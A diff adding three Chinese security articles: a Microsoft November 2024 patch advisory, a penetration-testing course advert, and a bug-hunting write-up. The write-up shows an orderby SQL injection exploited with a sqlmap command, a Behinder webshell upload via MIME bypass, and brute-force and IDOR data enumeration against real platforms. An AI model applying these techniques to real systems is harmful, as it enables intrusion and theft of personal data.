+![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") +> https://thehackernews.com/2024/11/urgent-critical-wordpress-plugin.html + + +> +> +> +> +> +> +> +> +> +> +> +> +> +> + + +![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect) + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect) + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect) + +![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "") + diff --git a/doc/微软2024年11月补丁日重点漏洞安全预警.md b/doc/微软2024年11月补丁日重点漏洞安全预警.md new file mode 100644 index 00000000..89b4c976 --- /dev/null +++ b/doc/微软2024年11月补丁日重点漏洞安全预警.md @@ -0,0 +1,155 @@ +# 微软2024年11月补丁日重点漏洞安全预警 +原创 山石漏洞管理中心 山石网科安全技术研究院 2024-11-19 13:56 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/Gw8FuwXLJnTalroibI59iaLlkyOb0JsTpzMJRG51KBzsPnDu6GFzJ9uGblRqDMaI4oGMb4pROoicvqZ25rXibR5oIA/640?wx_fmt=jpeg "") + +**补丁概述** + + + +2024 年 11 月 12 日,微软官方发布了 11 月安全更新,针对 89 个 Microsoft CVE 和 3 个 non-Microsoft CVE 进行修复。Microsoft CVE 中,包含 4 个严重漏洞(Critical)、84 个重要漏洞(Important)和 1 个中危漏洞(Moderate)。从漏 +洞影响上看,有 51 个远程代码执行漏洞、28 个权限提升漏洞 +、4 个拒绝服务漏洞、 +3 个欺骗漏洞、2 个安全功能绕过漏洞和 1 个信息泄露漏洞。 + +89 个漏洞中,目前有漏洞 **CVE-2024-43451**、CVE-2024-49039 被发现在野利用,漏洞 **CVE-2024-43451** +、CVE-2024-49019、CVE-2024-49040**** +已被公开披露,有 8 个利用可能性较大的漏洞。 + +本次安全更新涉及多个 Windows 主流版本,包括 Windows 10、Windows 11、Windows Server 2022、 +Windows Server 2025  +等;涉及多款主流产品和组件,如 SQL Server、Windows 电话服务、 +Windows USB 视频驱动程序、Microsoft Office Excel  +等。 + + +**重点关注漏洞** + + + +**在野利用和公开披露漏洞** + + + + +![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnQK231vKWcSX1qfvncpjgEeAp3YOFYxsWuDNzmdfQ1DDlOcCB2BIOfHwGmJ9tj3KN0RZXQyREJ7tg/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_svg/8h9QXaJ70ibcQ6KmfzwREV2ksvF628BodeILDHtjwoEcDhicoP1UtGo9YYyzO3Dic3FibZQCSZEau8uCoicfTicCnE3Kjr2xcTe0dM/640?wx_fmt=svg&from=appmsg "") + +

CVE

CVSS

Tag

CVE-2024-43451

6.5

Windows NTLM

CVE-2024-49039

8.8

Windows 任务计划程序

CVE-2024-49019

7.8

Windows Active Directory 证书服务

CVE-2024-49040

7.5

Microsoft Exchange Server

+ +![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnQK231vKWcSX1qfvncpjgEeAp3YOFYxsWuDNzmdfQ1DDlOcCB2BIOfHwGmJ9tj3KN0RZXQyREJ7tg/640?wx_fmt=png&from=appmsg "") + +- CVE-2024-43451:NTLM 哈希泄露欺骗漏洞,**已被发现在野利用并被公开披露**。 +此漏洞向攻击者泄露用户的 NTLMv2 哈希值,攻击者可以使用该哈希值来验证用户身份, +用户与恶意文件的最少交互(例如选择 / 单击、检查 / 右键单击或执行打开或运行之外的操作)都可能触发此漏洞。 + +- CVE-2024-49039:Windows 任务计划程序特权提升漏洞,**已被发现在野利用**。要利用此漏洞,经过身份验证的攻击者需要在目标系统上运行特制的应用程序,利用此漏洞将其权限提升到中等完整性级别。在这种情况下,可以从低权限的 AppContainer 执行成功的攻击。攻击者可以提升权限并以比 AppContainer 执行环境更高的完整性级别执行代码或访问资源。成功利用此漏洞的攻击者可以执行仅限特权帐户的 RPC 函数。 + +- CVE-2024-49019: +Active Directory 证书服务特权提升漏洞 +,**已被公开披露**,**该漏洞利用可能性较大** +。 +成功利用此漏洞的攻击者可以获得域管理员权限, +如果未根据保护 PKI 的保护证书模板部分中发布的最佳实践来保护模板,则使用主题名称来源设置为“在请求中提供”的版本 1 证书模板创建的证书可能会受到攻击。 + +- CVE-2024-49040: +Microsoft Exchange Server 欺骗漏洞 +,**已被公开披露,该漏洞利用可能性较大。** +该漏洞是因为 + SMTP 服务器以不同的方式解析收件人地址,从而导致电子邮件的欺骗,这 +由当前实施的 +发生在传输中的 + P2 FROM 标头验证引起的。 + +**利用可能性较大的漏洞** + + + + + +![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnQK231vKWcSX1qfvncpjgEeAp3YOFYxsWuDNzmdfQ1DDlOcCB2BIOfHwGmJ9tj3KN0RZXQyREJ7tg/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_svg/8h9QXaJ70ibcQ6KmfzwREV2ksvF628BodeILDHtjwoEcDhicoP1UtGo9YYyzO3Dic3FibZQCSZEau8uCoicfTicCnE3Kjr2xcTe0dM/640?wx_fmt=svg&from=appmsg "") + +

CVE

CVSS

Tag

CVE-2024-43623

7.8

Windows NT OS 内核

CVE-2024-43629

7.8

Microsoft DWM 核心库

CVE-2024-43630

7.8

Windows Kernel

CVE-2024-43636

7.8

Microsoft DWM 核心库

CVE-2024-43642

7.5

Windows SMB

CVE-2024-49033

7.5

Microsoft Office Word

+ +![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnQK231vKWcSX1qfvncpjgEeAp3YOFYxsWuDNzmdfQ1DDlOcCB2BIOfHwGmJ9tj3KN0RZXQyREJ7tg/640?wx_fmt=png&from=appmsg "") + +- CVE-2024-43623:Windows NT OS 内核特权提升漏洞。整数溢出或环绕(CWE-190)缺陷,成功利用此漏洞的攻击者可以获得 SYSTEM 权限。 + +- CVE-2024- +43629 +:Windows DWM 核心库特权提升漏洞。不受信任的指针解 +引用(CWE-822 +)缺陷,成功利用此漏洞的攻击者可以获得 SYSTEM 权限。 + +- CVE-2024- +43630:Windows 内核特权提升漏洞。 +基于堆的缓冲区溢出(CWE-122)缺陷,成功利用此漏洞的攻击者可以获得 SYSTEM 权限。 + +- CVE-2024-43636 +:Win32k 特权提升漏洞。不受信任的指针解 +引用(CWE-822 +)缺陷,成功利用此漏洞的攻击者可以获得 SYSTEM 权限。 + +- CVE-2024- +43642:Windows SMB 拒绝服务漏洞。Use-After-Free(CWE-416)缺陷,成功利用此漏洞后可导致使用 SMB 协议的系统拒绝服务。 + +- CVE-2024-49033:Microsoft Word 安全功能绕过漏洞。此漏洞可能允许攻击者绕过 Office Protected View 的特定功能,成功利用此漏洞需要攻击者收集特定于目标组件环境的信息。利用该漏洞需要诱使用户打开特制的 Word 文件。 + + + +**CVSS 3.1 Base Score高评分漏洞** + + +![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnQK231vKWcSX1qfvncpjgEeAp3YOFYxsWuDNzmdfQ1DDlOcCB2BIOfHwGmJ9tj3KN0RZXQyREJ7tg/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_svg/8h9QXaJ70ibcQ6KmfzwREV2ksvF628BodeILDHtjwoEcDhicoP1UtGo9YYyzO3Dic3FibZQCSZEau8uCoicfTicCnE3Kjr2xcTe0dM/640?wx_fmt=svg&from=appmsg "") + +

CVE

CVSS

Tag

CVE-2024-43602

9.9

Azure CycleCloud

CVE-2024-43498

9.8

.NET 和 Visual Studio

CVE-2024-43639

9.8

Windows Kerberos

+ +![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnQK231vKWcSX1qfvncpjgEeAp3YOFYxsWuDNzmdfQ1DDlOcCB2BIOfHwGmJ9tj3KN0RZXQyREJ7tg/640?wx_fmt=png&from=appmsg "") + +- CVE-2024-43602:Azure CycleCloud 远程代码执行漏洞。 +具有基本用户权限的攻击者可以发送特制请求来修改 Azure CycleCloud 群集的配置,以获得根级别权限,使他们能够在当前实例中的任何 Azure CycleCloud 群集上执行命令,并且在某些情况下会泄露管理员凭据。 + +- CVE-2024-43498:.NET 和 Visual Studio 远程执行代码漏洞,**被标记为严重(Critical)漏洞**。未经身份验证的远程攻击者可以通过向易受攻击的 .NET Web 应用程序发送特制请求,或将特制文件加载到易受攻击的桌面应用程序来利用此漏洞。 + +- CVE-2024-43639:Windows KDC 协议远程代码执行漏洞,**被标记为严重(Critical)漏洞**。未经身份验证的攻击者可以使用特制的应用程序来利用 Windows Kerberos 中的加密协议漏洞对目标执行远程代码执行。此漏洞仅影响配置为 Kerberos 密钥分发中心(KDC)代理协议服务器的 Windows 服务器,域控制器不受影响。 + +**严重漏洞(Critical)** + + + +![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnQK231vKWcSX1qfvncpjgEeAp3YOFYxsWuDNzmdfQ1DDlOcCB2BIOfHwGmJ9tj3KN0RZXQyREJ7tg/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_svg/8h9QXaJ70ibcQ6KmfzwREV2ksvF628BodeILDHtjwoEcDhicoP1UtGo9YYyzO3Dic3FibZQCSZEau8uCoicfTicCnE3Kjr2xcTe0dM/640?wx_fmt=svg&from=appmsg "") + +

CVE

CVSS

Tag

CVE-2024-43625

8.1

Windows VMSwitch

CVE-2024-49056

7.3

Airlift.microsoft.com

+ +![](https://mmbiz.qpic.cn/mmbiz_png/Gw8FuwXLJnQK231vKWcSX1qfvncpjgEeAp3YOFYxsWuDNzmdfQ1DDlOcCB2BIOfHwGmJ9tj3KN0RZXQyREJ7tg/640?wx_fmt=png&from=appmsg "") + +- CVE-2024-43625:Microsoft Windows VMSwitch 特权提升漏洞。攻击者通过该漏洞从低权限的 Hyper-V Guest 执行攻击,可以穿越 Guest 的安全边界在 Hyper-V 主机执行环境上执行代码。成功利用此漏洞的攻击者可以获得 SYSTEM 权限,利用该漏洞需要攻击者收集特定于环境的信息,并在利用之前采取其他操作来准备目标环境。利用时,攻击者需要向 VMswitch 驱动程序发送一系列特定的网络请求,从而触发 Hyper-V 主机中的 Use-After-Free 漏洞。 + +- CVE-2024-49056:Airlift.microsoft.com 特权提升漏洞。 +假定不可变数据绕过身份验证( +CWE-302)缺陷, +Microsoft 已完全缓解此漏洞,使用此服务的用户无需执行任何操作。 + + + +**处置建议** + + + +根据微软官方指引,尽快下载安装补丁包进行修复,也可开启 Windows 自动更新保证补丁包的自动安装。 + +Microsoft 11 + 月安全更新指引: + +https://msrc.microsoft.com/update-guide/releas +eNote/2024-Nov + + + diff --git a/doc/渗透测试 -- 漏洞百解.md b/doc/渗透测试 -- 漏洞百解.md new file mode 100644 index 00000000..04bd830d --- /dev/null +++ b/doc/渗透测试 -- 漏洞百解.md @@ -0,0 +1,36 @@ +# 渗透测试 -- 漏洞百解 + 网络安全者 2024-11-19 16:00 + +本套课程在线学习(网盘地址,保存即可免费观看)地址: + +https://pan.quark.cn/s/9df4d67e9a00 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/0JJXjA8siccw6BvgTWZz4zGRh5icicfB50lMPRgTz7HhjDiaVJLAPmqG7SjSZpdwibOWd9o9fz77wib1bia3CHNJrIiccw/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/0JJXjA8siccw6BvgTWZz4zGRh5icicfB50lw7ZxadfJgTNaObialgVfiaIsgNDrSGxadd78Ted82ticdoJ3esgyVoziaQ/640?wx_fmt=png&from=appmsg "") + +该内容转载自网络,仅供学习交流,勿作他用,如有侵权请联系删除。 + + + + +个人微信:ivu123ivu + + +**各 类 学 习 教 程 下 载 合 集** + + + + + + + + + +https://pan.quark.cn/s/8c91ccb5a474 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/8H1dCzib3UibuuhdO7GMx4wqK5PQMWgr8pNaudBlYJUYXP6R6LcL0d3UYmPLoiajIXwaibhvlchGibgiaBGwMSwuq58g/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + diff --git a/doc/漏洞挖掘|电子商城类漏洞挖掘案例灵感复现.md b/doc/漏洞挖掘|电子商城类漏洞挖掘案例灵感复现.md new file mode 100644 index 00000000..fbab8062 --- /dev/null +++ b/doc/漏洞挖掘|电子商城类漏洞挖掘案例灵感复现.md @@ -0,0 +1,335 @@ +# 漏洞挖掘|电子商城类漏洞挖掘案例灵感复现 + Z2O安全攻防 2024-11-19 13:17 + +**0x01 前言** + +    电子商城购物系统我们每天都能接触到,现在的商城系统,大多数已经在小程序、APP方向去开发了,因为灵活,方便管理且开发难度不高,当然,现在WEB系统还很多,我们本次会选几个SRC去浅挖一下那些电子商城系统存在的漏洞,黑盒占多数,其中有某电子商城白盒测试(历史漏洞),当然,在黑盒测试中,逻辑漏洞占大多数,像我们之前说过的:**命令执行和代码执行这种漏洞,基本上只能去靠审代码,因为需要拼接参数,可能少一个参数甚至一个符号都RCE失败,文件上传和SQL注入可能还能浅试一下** + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOe0QzwM83P2INIqlyOtcqiajW5TcBHjnQvH62Kr180yWAYy8qeAbicQOQ/640?wx_fmt=png&from=appmsg "") + +*** 本文章仅供学习参考,完全仿真环境复现,禁止非法攻击,后果自负** + +*** 如您认为文章有用,麻烦点个关注点赞并转发共同学习** + +**0x02 漏洞挖掘** + +**P1. 白盒-仿Tmall商城(历史漏洞)** +
机器名称机器IP
攻击机172.16.1.50
靶机172.16.1.204
+**代码审计阶段** + +    首先,我们需要在攻击机内IDEA导入相关源代码,因为是传统的spring框架搭建,在pom.xml会看到使用的相关依赖,有时候在这里可能会发现意想不到的收获,比如老版本的框架等 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esS0NhicKh4yEb8I7h78WvTiaZVKjnqKV2W7HmO2SFWBxiaPevwrfVfptKBg/640?wx_fmt=png&from=appmsg "") + +    然后在代码main目录中,往下递归看有controller层,相关的核心代码都在这里,俗称MVC框架,这个就是C + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSiboOQq2ibtBAWno54h023mbclic7MaCE7nCr1uolicohbmEibZnEVjfPgcA/640?wx_fmt=png&from=appmsg "") + +    传统的代码审计方式,肯定根据想挖掘的漏洞放心去查关键字符号等,比如此处出现的SQL注入,这里的数据库使用的是Mybatis,我们全局搜索**${**关键字 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSJVHkhfJ1kqwvQEnd4yyVN5USqBnyKRXVFvajmINOtpml9vyvbzr4mQ/640?wx_fmt=png&from=appmsg "") + +    像SQL语句一般定义在XML文件中,主要找此类文件 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSI8CrgtibUD5Q2q8DXHZrgFexRp5Mm5wlbdv3UJ74nicILnIxjC0HZHHQ/640?wx_fmt=png&from=appmsg "") + +   往上看CTRL跟进可疑位置:dao层UserMapper,进入相关java视图 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esS4o4giaf9XcX8Rs2Smf24NpHCkLr4qhZ8EI4CyrOAm0argYLm0fBBQKg/640?wx_fmt=png&from=appmsg "") + +    继续跟进select来查看谁使用了这个函数 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSIuodASibNsmq6Liawu8hH0ISHdV1zQ15HVibw5Ik5icfKkYib0GNw7DciaPQ/640?wx_fmt=png&from=appmsg "") + +    在UserServiceIMPI.java中定义了一个方法:getList,这个方法需要使用orderUtil,继续跟进谁使用了getList方法 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSicvLIwdPCYEwh9ibvSMhflBRGELnRAib4mC3ia8PV9ZG25f4ae9SOd5URA/640?wx_fmt=png&from=appmsg "") + +    跟进去后,看到170行使用了orderUtil,往上看定义中使用了ordeyBy和isDesc + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSCNPqEXRPpmib6foy61VwBMNzNtJpXicia43BUtHDZJZzIddGmzFaxMmjg/640?wx_fmt=png&from=appmsg "") + +    跟进是可以看注释的,但是这个在SQL语句中,师傅们应该都知道什么意思 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpMhVjoGbibaJppJicmLH51esSKML833qqUPC4ictiatiaP2RJ6ugjJicGI6iahV5d9b4hM1vkjcLtE2NpPtQ/640?wx_fmt=png&from=appmsg "") + +    然后在上面的value处可以看到使用的url路径,大概猜测是查询用户,然后进行倒序处理之类的功能 + +**SQL注入实测** + +    因为是后台漏洞,所有需要登录后台登录页面: +``` +访问:http://172.16.1.204:8087/tmall/admin 登录 +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BO7kVq1YaIrhAvibobWlsZ3rDaOxHm9wUSjMD3Y8yrmWMl6EWyude4ETw/640?wx_fmt=png&from=appmsg "") + +    在用户管理-查询时,进行翻页,在burp suite处会出现orderby参数 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOD4ibxNiaHZQ9uQ0kODIzaP1nsbFhxeXrG9rOT5K8JFxicB6JImStAR3nw/640?wx_fmt=png&from=appmsg "") + +    给orderby赋值给1和99可以看到正常存在和报错信息,说明SQL语句的执行 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOqMCU80LSQYoB1F3v9HxUKMaBIFOouqCKV1jzC0wLCOmx5ceQhEBJTA/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOnBG9jFXARyPyh8UgchF7iaH2CozZeS50icpNmcCQNGHhvDtsL30vq6gA/640?wx_fmt=png&from=appmsg "") + +    直接丢sqlmap去跑,因为是后台漏洞,可以指定cookie或直接保存数据包去跑 +``` +sqlmap -r 1.txt -p orderby --dbs +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOoBO7R1FBcAZrSxmjL5wfQdmpAl5ROYrpuPZZtLuaKdSNxeW2BpmliaA/640?wx_fmt=png&from=appmsg "") + +**任意文件上传代码审计** + +    在进行代码审计时,搜索关键字比全篇通读较合适,全片通读较为仔细,但是比较浪费时间,这里使用IDEA搜索到**UploadHandle** +有文件使用 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOoP2NcRrGdPkxVWibWorZnibjFVa3Ez1SPXia6Z3JQicj6iamicbtPiaLRgfSw/640?wx_fmt=png&from=appmsg "") + +    然后经过跟进得知被调用处为后台头像上传处,进行测试,F12定位到头像处,看到文件上传前端限制的文件类型 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOBp0Sv8Pj1KIoibqyXxbvLs9oSVmFGwweXiczltXPdr4bPGicoiaxJRsrCw/640?wx_fmt=png&from=appmsg "") + +    上传一张正常图片可以上传成功,然后使用冰蝎马上传,通过更改mime绕过前端限制上传成功 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOHRLwzCicuJA0n7T6iamPCZuQOFsvezJcSS5ehicgInwSzdjWydF7eAaibQ/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOUu2KvwbsQKBolriaWuia0y4UlHKZRcSw8u7icCHtKDPibKOGLg1eakBMmg/640?wx_fmt=png&from=appmsg "") + +    最后通过路径拼接,使用冰蝎连接成功,完成任意文件上传 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpPGbCLybMynXxtLiaXzT73BOp5z0Ns1l7lD4VOiaELHQ5dgZoPPhiab8OjnJhuDZzh0DDtK85ku7ncEA/640?wx_fmt=png&from=appmsg "") + +    我们之前提到的SQL注入和任意文件上传在黑盒中挖掘出洞的概率远比代码执行和命令执行概率高,可以自行试想一下,把代码审计步骤去掉,这些黑盒步骤是否也能做出来呢 + +**P2. 黑盒-某图书商城敏感信息泄露** + +    这个是去年挖的一个漏洞,那时候刚做公众号没多久,不太会排版、写文以及脱敏框架,当时写的不是很细,现在在回头看看 + +**实战|记一次某企业网站的信息泄露漏洞挖掘** + +    这是一个图书商城的漏洞,大概有二十年左右了,比较大的一个企业,很不可思议 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpO1qpcfNE2avU0B6vNzAp5iayZRV2VskpWTRCfpBovvicAPxHQ0ItUz1ugzbxxGdZ6hoR8dwQKUictiaw/640?wx_fmt=png&from=appmsg "") + +    在这个商城中,有一个商家板块,我们通过商家主页可以看到在售商品,通过插件可以看到,使用的是PHP语言 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OsDmQF5QCVwPuqVo9DcibXSKNvXXG6yw0TbF4ibTW4fdQlAWd0BdtKNmA/640?wx_fmt=png&from=appmsg "") + +    然后前端调用了js文件,其中js中含有api链接,这个api我们使他报错可以看到有点形似swagger的样子 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OSHbCZaDSiceicHV5HSponqmlGvlMf6s6u5bmkSQ0Wz1sa6pW75hgFL5w/640?wx_fmt=png&from=appmsg "") + +    通过提取前端的一些api,可以看到widget/ajax一类的应该是和商家信息有关,因为在其它页面没有 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OXCF7I4OuCIVwDRunMYB3hlF6GVm9Fud5R37uLsqZW9r0pXLISI9Yyg/640?wx_fmt=png&from=appmsg "") + +    其中呢ajax类似于接口文件,后面跟的参数:shopinfo也就是商品信息,tpl更类似于二级栏目,api就是调用类型,在往后正常情况下每个接口需要跟一个shopid也就是商家店铺id,别问我为啥知道的,挖逻辑漏洞就是不断的拼接参数 + +    首先呢,它会鉴权,我们先登录,再去看 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1O0RzggRxgVQnvQQrw00pu2z09J17XQ2kC3OoYHL12DRuw1ic8SYJknUw/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1Oe1lAoG92uuQiaOPnBQt90LqmmdFYVcrwbudIjlHCDQvQEBTv9JvB6PA/640?wx_fmt=png&from=appmsg "") + +    依次遍历api接口,并加shopid,后找到商家泄露信息的api + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OwIAqIvk3yrvsGJ5KLPrvHV6Enlw2RA0Sog4JAZ2zZCibXfau783GT9A/640?wx_fmt=png&from=appmsg "") + +    当时该API还泄露了商家的身份证号的,我一激动直接去找平台客服了,然后当时他们就修了,后面漏洞就不认了,说是正常功能,泄露信息大概在几十万左右,泄露信息:个人姓名,身份证号,手机号,小区住址,邮箱等信息 + +    大概逻辑就是:中间的一个API定义好后,前端的用户浏览需要调用部分数据,后端的商家版可能会调用全部数据,平台为了省事直接用了同一个API + +    这个大概是当时挖到比较快又比较严重的洞了,可惜激动的把等级给降级了,可怜的公益类型4库币 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OTu7vInk4icsujhz3r1qjFicicweDqZLE8OkYvsbeXjNfQrUKZkSTgd4IQ/640?wx_fmt=png&from=appmsg "") + +**P3.APP-某票务购物平台多处SQL注入漏洞** + +    没错,这还是一家上市公司,当然好像这走势凉了哈,跟闹着玩一样 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNXZvOMwiad3EibKf95mejI1OqyWHMFL4KQquKiaVL65YBKqAVkQ2qvq9YzMuTEgxdHJF2qhomlvFWXA/640?wx_fmt=png&from=appmsg "") + +    然后这个公司的某业务WEB站点下,防御做的非常好,所有地方该加密的都加密了,确实手足无措![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuP4rt0Yc3o7b5Mia9xdtUjrpnWmBBgjVqxdicb8PtHB3dEXxHVH7QgGEAw/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + +    不过好在经过信息搜集找到了APP,但是没有用户注册通道,一时间犯了难 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpO1qpcfNE2avU0B6vNzAp5iaq1uvcMI9Irpd0UUfCibTydMicETBs7IdAeNs3TZ1Q6K5FSIyCG0Dprug/640?wx_fmt=png&from=appmsg "") + +    于是乎使用了魔法,找到了一些账号密码,然后登录成功,APP可以在模拟器运行,并且可以抓包,不用在逆向什么的了 + +**1. 账号密码可爆破** + +    首先就是登录页面,传参是GET方式传参,没有限制登录次数以及加密,有爆破风险 +``` +/api/xxx/xxx/key=xxx&uname=xxx&pwd=123456 +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPrjcmzgjg4TcrOQ6vzmh0sG0iaZkwHtDQXqq2Z2pKJzKJH3nQ1tibmAqg/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**2. 越权敏感信息遍历** +``` +api/xxx/xxx.php?key=xxx&uid=xxx +``` + +    经过测试,key值必须存在,但非和用户有关,无绑定联系,只需按照顺序枚举uid即可越权浏览用户信息 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPCkPKADsn2hDacq2aRMRtxsjkeYn1CDx8zYty2cfyZBBzuvrluhYniaQ/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +    遍历后可以获取到用户:手机号,地址,部门,注册时间,邮箱等,大概有几万个信息 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPp0TdrIibvZ6IZECujq8QKTy2cXjpzoEWyZYCDjJYdAyHebiadicEcmJUg/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**3. 越权增删改查用户信息** + +    首先先看用户个人信息修改页面,抓取到API + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPAUc7VPnnoSHeWaqfsFAAZYoc7ib4EAIDRSXeaTshoOe1VmDEhaGXrnQ/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +     +继续使用api添加一个不规则数据,添加成功,判断只有前端进行规则匹配验证,API没做过滤 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPxuMPwmaO2ZuuCuOt3aWCzdyhNm07Qzd9J97dPzYas12BKzeUvnTbCQ/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +    我们修改一下其他人的信息,填写UID即可完成越权操作 + +![](https://mmbiz.qpic.cn/mmbiz_png/icdGEWOnYLpNzovfYchLkQyr9A3gWMsuPIVcVtmNWHDG2eZj5p3F7ia5LjlYR8wnWqoiaZOP9FiaY2GHJU0DqYuibsw/640?wx_fmt=other&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +    